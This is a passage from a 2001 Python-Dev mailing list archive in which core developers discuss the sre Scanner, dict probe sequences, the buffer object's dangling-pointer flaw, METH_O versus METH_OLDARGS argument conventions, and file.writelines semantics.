mostly that there's been no discussion of the API at all. WRT lastindex and lastgroup, I think purely the former. > Here's the code that doesn't work for me: > > from sre import Scanner > > scanner = Scanner([ > (r"[a-zA-Z_]\w*", None), > (r"\d+\.\d*", None), > (r"\d+", None), > (r"=|\+|-|\*|/", None), > (r"\s+", None), > ]) 1. Every tokenization regexp must contain exactly one capturing group. The lack above is the source of your later TypeError. Unclear to me whether that was the intent, or ust the way the code happens to work today. 2. When an action is None, the substring matched by the pattern will be thrown away. You need to supply non-None actions if you want anything to show up in the token list. > tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar") > > Traceback (most recent call last): > File "junk.py", line 11, in ? > tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar") > File "c:\program files\python21\lib\sre.py", line 254, in scan > action = self.lexicon[m.lastindex][1] > TypeError: sequence index must be integer > > m.lastindex is None Here's a working rewrite: from sre import Scanner def retrieve(scanner, group): return group scanner = Scanner([ (r"([a-zA-Z_]\w*)", retrieve), (r"(\d+\.\d*)", retrieve), (r"(\d+)", retrieve), (r"(=|\+|-|\*|/)", retrieve), (r"(\s+)", None), # ignore whitespace ]) tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar") print tokens, `tail` That prints ['sum', '=', '3', '*', 'foo', '+', '312.50', '+', 'bar'] '' In return for that, how about *you* supply a works-on-Windows rewrite of test_urllib2.py? You know more about that than anyone, and the test has been failing for weeks. From MarkH at ActiveState.com Sun May 27 04:39:43 2001 From: MarkH at ActiveState.com (Mark Hammond) Date: Sun, 27 May 2001 12:39:43 +1000 Subject: [Python-Dev] strop vs. string In-Reply-To: Message-ID: [Tim] > The buffer object has been neglected for years: is that because it's in > prime shape, or because nobody cares about it enough to maintain it? My take is a little different. I think people could be convinced to care about it, and indeed I do. However, it has one fatal flaw, and no one seems to know what to do about it. The problem is the one best demonstrated with the array module - if you get a pointer to the buffer interface for an array object, but the array then resizes itself, the buffer pointer dangles. There have been a few attempts over time to raise the buffer profile, but this design flaw leaves people scratching their head - it is hard to press for adoption of a feature that has a known crash hiding away. However, addressing this problem is difficult. Guido appears unconvinced that buffer objects and interfaces are that worthwhile. It appears no one else knows how to proceed in the face of this ambivalence - that describes my take even if no one elses. The-buffer-is-dead,-long-live-the-buffer ly, Mark. From tim.one at home.com Sun May 27 08:34:53 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 27 May 2001 02:34:53 -0400 Subject: [Python-Dev] Next dict crusade Message-ID: I'm still trying to work off the backlog of ignored dict ideas. Way back here: http://mail.python.org/pipermail/python-dev/2000-December/011085.html Christian Tismer suggested using polynomial division instead of multiplication for generating the probe sequence, as a way to get all the bits of the hash code into play. The desirability of doing that is illustrated by, e.g., this program: def f(keys): from time import clock d = {} s = clock() for k in keys: d[k] = k f = clock() print "build time %.3f" % (f-s) s = clock() for k in keys: assert d.has_key(k) f = clock() print "search time %.3f" % (f-s) # Excellent performance. keys = range(20000) for i in range(5): f(keys) # Terrible performance; > 500x slower. keys = [i << 16 for i in range(20000)] for i in range(5): f(keys) Christian had a very clever (cheap and effective) solution: Old algortithm (multiplication): shift the index left by 1 if index > mask: xor the index with the generator polynomial New algorithm (division): if low bit of index set: xor the index with the generator polynomial shift the index right by 1 where "index" should really read "increment", and unlike today we do not mask off any of the bits of the initial increment (and that's what lets *all* the bits of the hash code come into play; there's no point to doing this otherwise). I've since discovered that it's got a fatal rare flaw: the new algorithm can generate a 0 increment, while the old algorithm cannot. Example: poly is 131 and hash is 145. Because we don't mask off any bits in computing the initial increment, the initial increment is computed as incr = hash ^ (hash >> 3) == 145 ^ (145 >> 3) == 145 ^ 18 == 131 == poly So if we don't hit on the first probe, the new if low bit of index set: xor the index with the generator polynomial shift the index right by 1 business sets incr to 0, and the result is an infinite loop (0 is a fixed point). I hate to add another branch to this. As is, the existing branch in both the old and new ways is of the worst possible kind: it's taken half the time, with a pseudo-random distribution. So there's not a branch-prediction gimmick on earth it won't fool. Note that there's no reasonable way to identify "bad values" for incr before the loop starts, either -- there's really no way to tell whether incr mod poly is 0 without a loop to do division steps until incr < poly (if incr < poly and incr != 0, incr can never become 0, so there's no more need to test after reaching that point). Such a "pre loop" would cost more than the existing loop in most cases, as we usually get out of the existing loop today on its first iteration. But in that case, what am I worried about ? time-for-a-checkin-ly y'rs - tim From martin at loewis.home.cs.tu-berlin.de Sun May 27 11:01:14 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Sun, 27 May 2001 11:01:14 +0200 Subject: [Python-Dev] Special-casing "O" In-Reply-To: <3B0F7D44.1A12CE0F@lemburg.com> (mal@lemburg.com) References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com> <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de> <3B0F7D44.1A12CE0F@lemburg.com> Message-ID: <200105270901.f4R91E601159@mira.informatik.hu-berlin.de> > To call these, the calling mechanism would have to cast these > to: > > foo(void *, void *, void *) > bar(void *, void *, void *, void *, void *) > > Wouldn't this work ? I think it would work, but I doubt it would save much compared to the existing approach. The main point of this patch is to improve efficiency, and (according to Jeremy's analysis), most of the time for calling a function is spend in PyArg_ParseTuple. So if we replace it with another interface that also relies on parsing a string, I doubt we'll improve efficiency. IOW, I won't implement that approach. If you do, I'd be curious to hear the results, of course. Regards, Martin P.S. There would be still cases where PyArg_ParseTuple is needed, e.g. for "O!". From mal at lemburg.com Sun May 27 12:26:27 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Sun, 27 May 2001 12:26:27 +0200 Subject: [Python-Dev] Special-casing "O" References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com> <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de> <3B0F7D44.1A12CE0F@lemburg.com> <200105270901.f4R91E601159@mira.informatik.hu-berlin.de> Message-ID: <3B10D653.4D81E280@lemburg.com> "Martin v. Loewis" wrote: > > > To call these, the calling mechanism would have to cast these > > to: > > > > foo(void *, void *, void *) > > bar(void *, void *, void *, void *, void *) > > > > Wouldn't this work ? > > I think it would work, but I doubt it would save much compared to the > existing approach. The main point of this patch is to improve > efficiency, and (according to Jeremy's analysis), most of the time for > calling a function is spend in PyArg_ParseTuple. So if we replace it > with another interface that also relies on parsing a string, I doubt > we'll improve efficiency. That's the point: we are not replacing PyArg_ParseTuple() with another parsing mechanism, we are only using PyArg_ParseTuple() as fallback solution for parser strings for which we don't provide a special case implementation. The idea is to simply do a strcmp() (*) for a few common combinations (like e.g. "O" and "OO") and then provide the same special case handling like you do with e.g. METH_O. The result would be almost the same w/r to performance and code reduction as with your approach. The only addition would be using strcmp() instead of a switch statement. The advantage of this approach is that while you can still provide special case handling of common parser strings, you can also provide generic APIs for most other parser strings by reverting to PyArg_ParseTuple() for these. > IOW, I won't implement that approach. If you do, I'd be curious to > hear the results, of course. I'll see what I can do... > P.S. There would be still cases where PyArg_ParseTuple is needed, > e.g. for "O!". True... can't win 'em all ;-) -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Sun May 27 12:30:48 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Sun, 27 May 2001 12:30:48 +0200 Subject: [Python-Dev] strop vs. string References: Message-ID: <3B10D758.3741AC2F@lemburg.com> Mark Hammond wrote: > > [Tim] > > The buffer object has been neglected for years: is that because it's in > > prime shape, or because nobody cares about it enough to maintain it? > > My take is a little different. I think people could be convinced to care > about it, and indeed I do. However, it has one fatal flaw, and no one seems > to know what to do about it. > > The problem is the one best demonstrated with the array module - if you get > a pointer to the buffer interface for an array object, but the array then > resizes itself, the buffer pointer dangles. I guess there are three ways to "solve" this: a) mutable types don't implement the getreadbuf interface b) the getreadbuf interface is complemented with a callback interface, so the the buffer object can be notified of the change c) calling getreadbuf on a mutable object causes this object to become immutable -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From jeremy at digicool.com Sun May 27 20:51:26 2001 From: jeremy at digicool.com (Jeremy Hylton) Date: Sun, 27 May 2001 14:51:26 -0400 (EDT) Subject: [Python-Dev] Special-casing "O" In-Reply-To: <200105270901.f4R91E601159@mira.informatik.hu-berlin.de> References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com> <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de> <3B0F7D44.1A12CE0F@lemburg.com> <200105270901.f4R91E601159@mira.informatik.hu-berlin.de> Message-ID: <15121.19630.329909.482775@slothrop.digicool.com> >>>>> "MvL" == Martin v Loewis writes: MvL> to the existing approach. The main point of this patch is to MvL> improve efficiency, and (according to Jeremy's analysis), most MvL> of the time for calling a function is spend in MvL> PyArg_ParseTuple. I'd like to qualify this a bit. What I reported earlier is that the BuiltinFuntionCall microbenchmark in pybench spends 30% of its time in PyArg_ParseTuple(). This strikes me as excessive, because it's a static property of the code. (One could imagine writing a Python script that parsed the "O!|is#" format strings and generated efficient, specialized C code for that format.) If we benchmark other programs, particularly those that do more work in the builtins, the relative cost of the argument processing will be lower. Jeremy From jeremy at digicool.com Sun May 27 20:55:36 2001 From: jeremy at digicool.com (Jeremy Hylton) Date: Sun, 27 May 2001 14:55:36 -0400 (EDT) Subject: [Python-Dev] Special-casing "O" In-Reply-To: References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> Message-ID: <15121.19880.775931.946049@slothrop.digicool.com> >>>>> "TP" == Tim Peters writes: TP> Do METH_O, convert every "O" function to use it, declare TP> victory, and enjoy the weekend . TP> 1%-of-the-work-for-80%-of-the-gain-and-an-overall-decrease-in-code- TP> size-ly y'rs - tim How is METH_O different than METH_OLDARGS? The old-style argument passing is definitely the most efficient for functions of a zero or one arguments. There's special-case code in ceval to support it these cases -- fast_cfunction() -- primarily because in these cases the function can be invoked by using arguments directly from the Python stack instead of copying them to a tuple first. Jeremy From tim.one at home.com Sun May 27 22:37:43 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 27 May 2001 16:37:43 -0400 Subject: [Python-Dev] Special-casing "O" In-Reply-To: <15121.19880.775931.946049@slothrop.digicool.com> Message-ID: [Jeremy] > How is METH_O different than METH_OLDARGS? I have no idea: can you explain it? The #define's for these symbols are uncommented, and it's a mystery to me what they're *supposed* to mean. > The old-style argument passing is definitely the most efficient for > functions of a zero or one arguments. There's special-case code in > ceval to support it these cases -- fast_cfunction() -- primarily > because in these cases the function can be invoked by using arguments > directly from the Python stack instead of copying them to a tuple > first. OK, I'm looking in bltinmodule.c, at builtin_len. It starts like so: static PyObject * builtin_len(PyObject *self, PyObject *args) { PyObject *v; long res; if (!PyArg_ParseTuple(args, "O:len", &v)) return NULL; So it's clearly expecting a tuple. But its entry in the builtin_methods[] table is: {"len", builtin_len, 1, len_doc}, That is, it says nothing about the calling convention. Since C fills in a 0 for missing values, and methodobject.c has /* Flag passed to newmethodobject */ #define METH_OLDARGS 0x0000 #define METH_VARARGS 0x0001 #define METH_KEYWORDS 0x0002 then doesn't the stuct for builtin_len implicitly specify METH_OLDARGS? But if that's true, and fast_cfunction() does not create a tuple in this case, how is that builtin_len gets a tuple? Something doesn't add up here. Or does it? There's no *reference* to METH_OLDARGS anywhere in the code base other than its definition and its use in method tables, so whatever code *keys* off it must be assuming a hardcoded 0 value for it -- or indeed nothing keys off it at all. I expect this line in ceval.c is doing the dirty assumption: } else if (flags == 0) { and should be testing against METH_OLDARGS instead. But I see that builtin_len is falling into the METH_VARARGS case despite that it wasn't declared that way and that it sure looks like METH_OLDARGS (0) is the default. Confusing! Fix it . From tim.one at home.com Sun May 27 22:46:29 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 27 May 2001 16:46:29 -0400 Subject: [Python-Dev] Special-casing "O" In-Reply-To: Message-ID: [Tim, thrashing] > ... > So it's clearly expecting a tuple. But its entry in the builtin_methods[] > table is: > > {"len", builtin_len, 1, len_doc}, > > That is, it says nothing about the calling convention. Oops, it does, using a hardcoded 1 instead of the METH_VARARGS #define. So that explains that. Next question: why isn't builtin_len using METH_OLDARGS instead? Is there some advantage to using METH_VARARGS in this case? This gets back to what these #defines are intended to *mean*, and I still haven't figured that out. From mwh at python.net Sun May 27 23:32:48 2001 From: mwh at python.net (Michael Hudson) Date: Sun, 27 May 2001 22:32:48 +0100 (BST) Subject: [Python-Dev] Special-casing "O" In-Reply-To: Message-ID: On Sun, 27 May 2001, Tim Peters wrote: > Next question: why isn't builtin_len using METH_OLDARGS instead? Is > there some advantage to using METH_VARARGS in this case? So you can't do >>> len(1,2) 2 a la list.append, socket.connect pre 2.0? (or was it 1.6?) My imprssion is that generally METH_VARARGS is saner than METH_OLDARGS (ie. more consistent). It seems the proposed METH_O is basically METH_OLDARGS + the restriction that there is in fact only one argument, so we save a tuple allocation over METH_VARARGS, but get argument count checking over METH_OLDARGS. Cheers, M. From tim.one at home.com Mon May 28 00:49:38 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 27 May 2001 18:49:38 -0400 Subject: [Python-Dev] Special-casing "O" In-Reply-To: Message-ID: [Tim] > Next question: why isn't builtin_len using METH_OLDARGS instead? Is > there some advantage to using METH_VARARGS in this case? [Michael Hudson] > So you can't do > > >>> len(1,2) > 2 > > a la list.append, socket.connect pre 2.0? (or was it 1.6?) If I didn't know better, I'd suspect Python's internal calling conventions at the start didn't perfectly anticipate all future developements. Among other things, looks like it's impossible for a METH_OLDARGS function to distinguish between being called with more than one argument and being called with a single tuple argument. > My imprssion is that generally METH_VARARGS is saner than METH_OLDARGS > (ie. more consistent). Yes, METH_OLDARGS does appear to, well, suck. > It seems the proposed METH_O is basically METH_OLDARGS + the > restriction that there is in fact only one argument, so we save > a tuple allocation over METH_VARARGS, Also, and more importantly, save the PyArg_ParseTuple call on the receiving end. > but get argument count checking over METH_OLDARGS. Which is worth getting. I'm back to where I started here: Do METH_O, convert every "O" function to use it, declare victory, and enjoy the weekend. 1%-of-the-work-for-80%-of-the-gain-and-an-overall-decrease-in-code- size-ly y'rs - tim PS: But today I'll add another: add at least one comment to the code -- this stuff is a bitch to reverse-engineer. From thomas at xs4all.net Mon May 28 00:50:58 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Mon, 28 May 2001 00:50:58 +0200 Subject: [Python-Dev] Special-casing "O" In-Reply-To: ; from mwh@python.net on Sun, May 27, 2001 at 10:32:48PM +0100 References: Message-ID: <20010528005058.H690@xs4all.nl> On Sun, May 27, 2001 at 10:32:48PM +0100, Michael Hudson wrote: > On Sun, 27 May 2001, Tim Peters wrote: > > Next question: why isn't builtin_len using METH_OLDARGS instead? Is > > there some advantage to using METH_VARARGS in this case? > So you can't do > >>> len(1,2) > 2 > a la list.append, socket.connect pre 2.0? (or was it 1.6?) And don't forget the method-specific errormessage by passing ':len' in the format string. Of course, this can easily be (and probably should) done by passing another argument to whatever parses arguments in METH_O, rather than invoking string parsing magic every call. -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From thomas at xs4all.net Mon May 28 00:58:30 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Mon, 28 May 2001 00:58:30 +0200 Subject: [Python-Dev] Special-casing "O" In-Reply-To: ; from tim.one@home.com on Sun, May 27, 2001 at 06:49:38PM -0400 References: Message-ID: <20010528005830.I690@xs4all.nl> On Sun, May 27, 2001 at 06:49:38PM -0400, Tim Peters wrote: > 1%-of-the-work-for-80%-of-the-gain-and-an-overall-decrease-in-code- > size-ly y'rs - tim And recycle a quote a day ;) > PS: But today I'll add another: add at least one comment to the code -- > this stuff is a bitch to reverse-engineer. But not just any comment, please! The Pine sourcecode is riddled with calls to 'mm_critical(stream)', and each call I've seen so far is nicely commented with the utterly useless comment '/* go critical */'. I'd-gladly-trade-in-every-mm_critical-comment-for-one-comment-to-describe- -what-Pine-actually-tries-to-do-ly y'rs, -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From martin at loewis.home.cs.tu-berlin.de Mon May 28 00:45:53 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Mon, 28 May 2001 00:45:53 +0200 Subject: [Python-Dev] Special-casing "O" In-Reply-To: <15121.19630.329909.482775@slothrop.digicool.com> (message from Jeremy Hylton on Sun, 27 May 2001 14:51:26 -0400 (EDT)) References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com> <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de> <3B0F7D44.1A12CE0F@lemburg.com> <200105270901.f4R91E601159@mira.informatik.hu-berlin.de> <15121.19630.329909.482775@slothrop.digicool.com> Message-ID: <200105272245.f4RMjru01021@mira.informatik.hu-berlin.de> > I'd like to qualify this a bit. What I reported earlier is that the > BuiltinFuntionCall microbenchmark in pybench spends 30% of its time in > PyArg_ParseTuple(). This strikes me as excessive, because it's a > static property of the code. (One could imagine writing a Python > script that parsed the "O!|is#" format strings and generated > efficient, specialized C code for that format.) > > If we benchmark other programs, particularly those that do more work > in the builtins, the relative cost of the argument processing will be > lower. Certainly: If the work inside the function increases, the overhead of calling it will be less visible. What the benchmark shows, however, and what my patch addresses, is that the time for *calling* a function is primarily spent in PyArg_ParseTuple (and not in, say, building argument tuples, putting parameters on the stack, fetching function addresses, building method objects, and so on). Regards, Martin From tim.one at home.com Mon May 28 01:17:27 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 27 May 2001 19:17:27 -0400 Subject: [Python-Dev] Special-casing "O" In-Reply-To: <20010528005058.H690@xs4all.nl> Message-ID: [Thomas Wouters] > And don't forget the method-specific errormessage by passing ':len' in > the format string. Of course, this can easily be (and probably should) > done by passing another argument to whatever parses arguments in > METH_O, rather than invoking string parsing magic every call. Martin's patch automatically inserts the name of the function in the TypeError it raises when a METH_O call doesn't get exactly one argument, or gets a (one or more) keyword argument. Stick to METH_O and it's a clear win, even in this respect: there's no info in an explicit ":len" he's not already deducing, and almost all instances of "O:name" formats today are exactly the same this way: if (!PyArg_ParseTuple(args, "O:abs", &v)) if (!PyArg_ParseTuple(args, "O:callable", &v)) if (!PyArg_ParseTuple(args, "O:id", &v)) if (!PyArg_ParseTuple(args, "O:hash", &v)) if (!PyArg_ParseTuple(args, "O:hex", &v)) if (!PyArg_ParseTuple(args, "O:float", &v)) if (!PyArg_ParseTuple(args, "O:len", &v)) if (!PyArg_ParseTuple(args, "O:list", &v)) else if (!PyArg_ParseTuple(args, "O:min/max", &v)) if (!PyArg_ParseTuple(args, "O:oct", &v)) if (!PyArg_ParseTuple(args, "O:ord", &obj)) if (!PyArg_ParseTuple(args, "O:reload", &v)) if (!PyArg_ParseTuple(args, "O:repr", &v)) if (!PyArg_ParseTuple(args, "O:str", &v)) if (!PyArg_ParseTuple(args, "O:tuple", &v)) if (!PyArg_ParseTuple(args, "O:type", &v)) Those are all the ones in bltinmodule.c, and nearly all of them are called extremely frequently in *some* programs. The only oddball is min/max, but then it supports more than one call-list format and so isn't a METH_O candidate anyway. Indeed, Martin's patch gives a *better* message than we get for some mistakes today: >>> len(val=2) Yraceback (most recent call last): File "", line 1, in ? TypeError: len() takes exactly 1 argument (0 given) >>> Martin's would say TypeError: len takes no keyword arguments in this case. He should add "()" after the function name. He should also throw away the half of the patch complicating and slowing METH_O to get some theoretical speedup in other cases: make the one-arg builtins fly just as fast as humanly possible. From greg at cosc.canterbury.ac.nz Mon May 28 02:23:55 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Mon, 28 May 2001 12:23:55 +1200 (NZST) Subject: [Python-Dev] strop vs. string In-Reply-To: Message-ID: <200105280023.MAA00996@s454.cosc.canterbury.ac.nz> > However, it has one fatal flaw, and no one seems > to know what to do about it. I think it would be safe if: 1) it kept a reference to the underlying object, and 2) it re-fetched the pointer and length info each time it was needed, using the underlying object's buffer interface. Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From greg at cosc.canterbury.ac.nz Mon May 28 02:28:41 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Mon, 28 May 2001 12:28:41 +1200 (NZST) Subject: [Python-Dev] strop vs. string In-Reply-To: <20010525132752.B5402@lyra.org> Message-ID: <200105280028.MAA01000@s454.cosc.canterbury.ac.nz> Greg Stein > "badly" is overstating the problem. It caches a pointer when it shouldn't. > This doesn't work well But "doesn't work well" means "can crash the interpreter". I don't think "badly" is an overstatement here... Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From tim.one at home.com Mon May 28 03:42:30 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 27 May 2001 21:42:30 -0400 Subject: [Python-Dev] strop vs. string In-Reply-To: <3B10D758.3741AC2F@lemburg.com> Message-ID: [MAL] > I guess there are three ways to "solve" this: > > a) mutable types don't implement the getreadbuf interface Of the few types that implement it today, that would leave only strings (8-bit and Unicode). Too much machinery just for that. Besides, I once posted an example to c.l.py showing how to use regexps to search mmap'ed files, so *that* must continue to work forever . > b) the getreadbuf interface is complemented with a callback > interface, so the the buffer object can be notified of > the change I like this best, although there's no bound on the number of buffers that may need to be notified in case of change (i.e., the object would need to maintain a list of buffers to be notified). > c) calling getreadbuf on a mutable object causes this object > to become immutable Even easier, core dump as soon as getreadbuf is called . [Greg Ewing] > I think it would be safe if: > > 1) it kept a reference to the underlying object, and That much it already does. > 2) it re-fetched the pointer and length info each time it was > needed, using the underlying object's buffer interface. If after b = buffer(some_object) b.__getitem__ needed to refetch the info between b[i] and b[i+1] I expect it would be so slow even Greg wouldn't want it anymore. From tim.one at home.com Mon May 28 03:52:18 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 27 May 2001 21:52:18 -0400 Subject: [Python-Dev] strop vs. string In-Reply-To: <3B0FD023.C4588919@lemburg.com> Message-ID: [Tim] > About combining strop and buffers and strings, don't forget > unicodeobject.c: that's got oodles of basically duplicate code too. > /F suggested dealing with the minor differences via maintaining one > code file that gets compiled multiple times w/ appropriate #defines. [MAL] > Hmm, that only saves us a few kB in source, but certainly not > in the object files. That's not the point. Manually duplicated code blocks always get out of synch, as people fix bugs in, or enhance, one of them but don't even know about the others. /F brought this up after I pissed away a few hours trying to repair one of these in all places, and he noted that strop.replace() and string.replace() are woefully inefficient anyway. > The better idea would be making the types subclass from a generic > abstract string object -- I just don't know how this will be > possible with Guido's type patches. We'll just have to wait, > I guess. Wait for what? If it were possible, is the chance that you'd take time to rework unicodeobject.c to "subclass from a generic abstract string object" greater than 0? The chance that I would is exactly 0. From martin at loewis.home.cs.tu-berlin.de Mon May 28 08:36:49 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Mon, 28 May 2001 08:36:49 +0200 Subject: [Python-Dev] Special-casing "O" Message-ID: <200105280636.f4S6anZ00972@mira.informatik.hu-berlin.de> > How is METH_O different than METH_OLDARGS? METH_O will raise an exception if the function is called with more than one argument, without calling the function. METH_OLDARGS will pass a tuple in this case. I believe you cannot distinguish between a single tuple argument and an invocation with multiple arguments in a METH_OLDARGS function, is that true? Regards, Martin From martin at loewis.home.cs.tu-berlin.de Mon May 28 09:40:54 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Mon, 28 May 2001 09:40:54 +0200 Subject: [Python-Dev] file.writelines("foo\n","bar\n") Message-ID: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de> When investigating calling conventions, I took a special look at METH_OLDARGS occurrences. While most of them look reasonable, file.writelines caught my attention. It has if (args == NULL || !PySequence_Check(args)) { PyErr_SetString(PyExc_TypeError, "writelines() argument must be a sequence of strings"); return NULL; } Because it is a METH_OLDARGS method, you can do f=open("/tmp/x","w") f.writelines("foo\n","bar\n") With my upcoming patches, I'd replace this with METH_O, making this call illegal. Does anybody see a problem with that change in semantics? Regards, Martin From thomas at xs4all.net Mon May 28 10:17:58 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Mon, 28 May 2001 10:17:58 +0200 Subject: [Python-Dev] file.writelines("foo\n","bar\n") In-Reply-To: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de>; from martin@loewis.home.cs.tu-berlin.de on Mon, May 28, 2001 at 09:40:54AM +0200 References: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de> Message-ID: <20010528101758.K690@xs4all.nl> On Mon, May 28, 2001 at 09:40:54AM +0200, Martin v. Loewis wrote: > When investigating calling conventions, I took a special look at > METH_OLDARGS occurrences. While most of them look reasonable, > file.writelines caught my attention. It has > if (args == NULL || !PySequence_Check(args)) { > PyErr_SetString(PyExc_TypeError, > "writelines() argument must be a sequence of strings"); > return NULL; > } > Because it is a METH_OLDARGS method, you can do > f=open("/tmp/x","w") > f.writelines("foo\n","bar\n") > With my upcoming patches, I'd replace this with METH_O, making this > call illegal. Does anybody see a problem with that change in > semantics? Hell yeah. About the same problem as with the 'l.append("foo", "bar")' problem in 1.5.2 -> [1.6, 2.x]. Oddly enough, this behaviour was added in 2.0, by converting a PyList_Check into a PySequence_Check: $ python1.5 >>> file.writelines("foo\n", "bar\n", "baz", "baz", "baz\n") Traceback (innermost last): File "", line 1, in ? TypeError: writelines() requires list of strings $ python2.0 >>> file.writelines("foo\n", "bar\n", "baz", "baz", "baz\n") >>> I do think we'll have to allow for this for one more release, with warnings and all. It's extremely unlikely that anyone is using this, but changing it without warning will definately not benifit 2.x's image wrt. stability ;P If bugfix-releases were allowed to generate additional warnings, I'd add a warning to 2.1.1.... -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From mal at lemburg.com Mon May 28 11:04:51 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Mon, 28 May 2001 11:04:51 +0200 Subject: [Python-Dev] strop vs. string References: Message-ID: <3B1214B3.9A4C295D@lemburg.com> Tim Peters wrote: > > [Tim] > > About combining strop and buffers and strings, don't forget > > unicodeobject.c: that's got oodles of basically duplicate code too. > > /F suggested dealing with the minor differences via maintaining one > > code file that gets compiled multiple times w/ appropriate #defines. > > [MAL] > > Hmm, that only saves us a few kB in source, but certainly not > > in the object files. > > That's not the point. Manually duplicated code blocks always get out of > synch, as people fix bugs in, or enhance, one of them but don't even know > about the others. /F brought this up after I pissed away a few hours trying > to repair one of these in all places, and he noted that strop.replace() and > string.replace() are woefully inefficient anyway. Ok, so what we'd need is a bunch of generic low-level string operations: one set for 8-bit and one for 16-bit code. Looking at unicodeobject.c it seems that the section "Helpers" would be a good start, plus perhaps a few bits from the method implementations refactored to form a low-level string template library. Perhaps we should move this code into a file stringhelpers.h which then gets included by stringobject.c and unicodeobject.c with appropriate #defines set up for 8-bit strings and for Unicode. > > The better idea would be making the types subclass from a generic > > abstract string object -- I just don't know how this will be > > possible with Guido's type patches. We'll just have to wait, > > I guess. > > Wait for what? If it were possible, is the chance that you'd take time to > rework unicodeobject.c to "subclass from a generic abstract string object" > greater than 0? The chance that I would is exactly 0. Well, that's hard to say. It would certainly be low-priority; same for the above refactoring. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Mon May 28 11:19:16 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Mon, 28 May 2001 11:19:16 +0200 Subject: [Python-Dev] Special-casing "O" References: Message-ID: <3B121814.E5E9896A@lemburg.com> Tim Peters wrote: > > [Thomas Wouters] > > And don't forget the method-specific errormessage by passing ':len' in > > the format string. Of course, this can easily be (and probably should) > > done by passing another argument to whatever parses arguments in > > METH_O, rather than invoking string parsing magic every call. > > Martin's patch automatically inserts the name of the function in the > TypeError it raises when a METH_O call doesn't get exactly one argument, or > gets a (one or more) keyword argument. > > Stick to METH_O and it's a clear win, even in this respect: there's no info > in an explicit ":len" he's not already deducing, and almost all instances of > "O:name" formats today are exactly the same this way: > > if (!PyArg_ParseTuple(args, "O:abs", &v)) > if (!PyArg_ParseTuple(args, "O:callable", &v)) > if (!PyArg_ParseTuple(args, "O:id", &v)) > if (!PyArg_ParseTuple(args, "O:hash", &v)) > if (!PyArg_ParseTuple(args, "O:hex", &v)) > if (!PyArg_ParseTuple(args, "O:float", &v)) > if (!PyArg_ParseTuple(args, "O:len", &v)) > if (!PyArg_ParseTuple(args, "O:list", &v)) > else if (!PyArg_ParseTuple(args, "O:min/max", &v)) > if (!PyArg_ParseTuple(args, "O:oct", &v)) > if (!PyArg_ParseTuple(args, "O:ord", &obj)) > if (!PyArg_ParseTuple(args, "O:reload", &v)) > if (!PyArg_ParseTuple(args, "O:repr", &v)) > if (!PyArg_ParseTuple(args, "O:str", &v)) > if (!PyArg_ParseTuple(args, "O:tuple", &v)) > if (!PyArg_ParseTuple(args, "O:type", &v)) > > Those are all the ones in bltinmodule.c, and nearly all of them are called > extremely frequently in *some* programs. The only oddball is min/max, but > then it supports more than one call-list format and so isn't a 